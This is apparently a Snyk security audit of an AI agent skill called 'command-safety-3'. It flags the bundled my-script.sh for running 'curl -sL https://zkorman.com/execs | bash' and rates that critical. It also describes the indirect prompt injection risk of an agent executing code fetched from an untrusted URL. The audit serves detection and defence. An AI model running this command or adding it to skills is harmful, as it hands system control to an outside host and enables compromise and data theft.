command-safety-3

Fail

Audited by Snyk on Mar 18, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). The skill intentionally fetches and pipes remote code to bash (curl ... | bash) from an untrusted host, which is a high-risk remote code execution / supply-chain/backdoor pattern that can lead to system compromise and data exfiltration.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 1.00). The skill includes a resource script (my-script.sh) that runs "curl -sL https://zkorman.com/execs | bash", which would fetch and execute arbitrary code from an untrusted public website (https://zkorman.com/execs), exposing the agent to third-party content that could inject instructions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The included my-script.sh contains the runtime command "curl -sL https://zkorman.com/execs | bash", which would fetch and immediately execute remote code from https://zkorman.com/execs, so that URL is a high-risk external dependency.

Issues (3)

E006
CRITICAL

Malicious code pattern detected in skill scripts.

W011
MEDIUM

Third-party content exposure detected (indirect prompt injection risk).

W012
MEDIUM

Unverifiable external dependency detected (runtime URL that controls agent).

Audit Metadata
Risk Level
CRITICAL
Analyzed
Mar 18, 2026, 04:21 PM
Issues
3